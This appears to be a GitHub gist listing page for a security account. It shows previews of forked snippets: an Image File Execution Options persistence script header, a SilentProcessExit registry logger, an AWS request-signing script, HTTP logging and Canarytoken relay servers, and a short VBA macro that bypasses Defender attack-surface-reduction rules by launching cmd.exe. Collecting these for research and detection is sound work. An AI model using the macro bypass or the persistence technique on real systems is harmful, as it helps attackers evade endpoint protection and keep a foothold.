thinkst-cs
thinkst-cs
/ ImageFileExecutionOptions.ps1
Created
August 30, 2022 20:04
— forked from netbiosX/ImageFileExecutionOptions.ps1
Image File Execution Options Injection - Persistence Technique
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\nltest.exe] | |
| "ReportingMode"=dword:00000001 | |
| "MonitorProcess"="powershell.exe -Command \"Get-WmiObject win32_process -Filter 'ProcessID = %e' | select CreationDate,ProcessId,CommandLine >> C:\\\\Test\\\\Logcmdline.txt\"" | |
thinkst-cs
/ aws-sigv4-ssm-get-parameter.sh
Created
September 27, 2022 18:57
— forked from slawekzachcial/aws-sigv4-ssm-get-parameter.sh
Using CURL to call AWS ReST API, signing request with v4 signature
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Source: https://docs.aws.amazon.com/general/latest/gr/sigv4-signed-request-examples.html | |
| [[ -n "${AWS_ACCESS_KEY_ID}" ]] || { echo "AWS_ACCESS_KEY_ID required" >&2; exit 1; } | |
| [[ -n "${AWS_SECRET_ACCESS_KEY}" ]] || { echo "AWS_SECRET_ACCESS_KEY required" >&2; exit 1; } | |
| readonly parameterName="SlawekTestParam" | |
| readonly method="POST" |
thinkst-cs
/ aws-sigv4-ssm-get-parameter.sh
Created
September 27, 2022 18:57
— forked from slawekzachcial/aws-sigv4-ssm-get-parameter.sh
Using CURL to call AWS ReST API, signing request with v4 signature
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Source: https://docs.aws.amazon.com/general/latest/gr/sigv4-signed-request-examples.html | |
| [[ -n "${AWS_ACCESS_KEY_ID}" ]] || { echo "AWS_ACCESS_KEY_ID required" >&2; exit 1; } | |
| [[ -n "${AWS_SECRET_ACCESS_KEY}" ]] || { echo "AWS_SECRET_ACCESS_KEY required" >&2; exit 1; } | |
| readonly parameterName="SlawekTestParam" | |
| readonly method="POST" |
thinkst-cs
/ aws-sigv4-ssm-get-parameter.sh
Created
September 27, 2022 18:57
— forked from slawekzachcial/aws-sigv4-ssm-get-parameter.sh
Using CURL to call AWS ReST API, signing request with v4 signature
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Source: https://docs.aws.amazon.com/general/latest/gr/sigv4-signed-request-examples.html | |
| [[ -n "${AWS_ACCESS_KEY_ID}" ]] || { echo "AWS_ACCESS_KEY_ID required" >&2; exit 1; } | |
| [[ -n "${AWS_SECRET_ACCESS_KEY}" ]] || { echo "AWS_SECRET_ACCESS_KEY required" >&2; exit 1; } | |
| readonly parameterName="SlawekTestParam" | |
| readonly method="POST" |
thinkst-cs
/ ASR Rules Bypass.vba
Created
October 12, 2022 16:57
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
thinkst-cs
/ server.py
Created
October 13, 2022 17:02
— forked from mdonkers/server.py
Simple Python 3 HTTP server for logging all GET and POST requests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Very simple HTTP server in python for logging requests | |
| Usage:: | |
| ./server.py [<port>] | |
| """ | |
| from http.server import BaseHTTPRequestHandler, HTTPServer | |
| import logging | |
| class S(BaseHTTPRequestHandler): |
thinkst-cs
/ canary_relay
Created
October 13, 2022 17:30
Canary Relay Example - Return JSON but Trigger a Canarytoken
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Very simple HTTP server in python for logging requests | |
| Usage:: | |
| ./server.py [<port>] | |
| Original https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7 | |
| """ | |
| from http.server import BaseHTTPRequestHandler, HTTPServer | |
| from urllib import request | |
| import requests |
thinkst-cs
/ self-hosted-runners-playground.md
Created
November 29, 2022 17:08
— forked from swinton/self-hosted-runners-playground.md
Programmatically create a self-hosted runner
thinkst-cs
/ ProjectedFSLib.h
Created
December 7, 2022 03:09
— forked from fcharlie/ProjectedFSLib.h
ProjFs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*++ | |
| Copyright (c) Microsoft Corporation. All rights reserved. | |
| Module Name: | |
| projectedfslib.h | |
| Abstract: |
OlderNewer